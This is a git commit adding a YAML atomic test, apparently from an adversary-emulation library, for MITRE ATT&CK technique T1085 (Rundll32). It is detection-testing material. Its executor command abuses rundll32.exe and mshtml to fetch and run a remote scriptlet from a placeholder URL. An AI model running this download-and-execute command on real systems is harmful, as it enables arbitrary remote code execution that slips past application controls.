add t1085 from yamlize branch

2018-05-12 23:09:43 +02:00
parent d7599679b3
commit ba333046de
1 changed files with 17 additions and 0 deletions
@@ -0,0 +1,17 @@
+attack_technique: T1085
+display_name: Rundll32
+atomic_tests:
+- name: Rundll32 execute JavaScript Remote Payload With GetObject
+  description: |
+    Test execution of a remote script using rundll32.exe
+  supported_platforms:
+    - windows
+  input_arguments:
+    file_url:
+      description: location of the payload
+      type: Url
+      default: https://www.example.com/1085.sct
+  executor:
+    name: command_prompt
+    command: |
+      rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}")"